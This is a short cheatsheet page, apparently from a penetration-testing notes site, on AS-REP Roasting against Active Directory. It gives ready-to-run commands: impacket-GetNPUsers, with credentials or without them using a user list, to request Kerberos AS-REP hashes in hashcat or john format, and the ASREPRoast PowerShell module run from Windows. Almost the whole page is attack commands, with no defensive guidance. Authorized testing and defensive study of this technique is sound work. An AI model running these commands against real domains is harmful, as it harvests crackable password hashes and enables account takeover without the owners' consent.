search

AS-REP Roasting

Cheatsheet with commands for performing AS-REP Roasting from the outside and inside.

hashtag
From Linux:

Using Impacketarrow-up-right:

impacket-GetNPUsers <domain_name>/<domain_user>:<domain_user_password> -request -format <hashcat/john> -outputfile <output>

or without credentials:

impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt

hashtag
From Windows:

Using ASREPRoastarrow-up-right:

Import-Module .\ASREPRoast.ps1
Invoke-ASREPRoast

PreviousKerberoastingNextAttacks

Last updated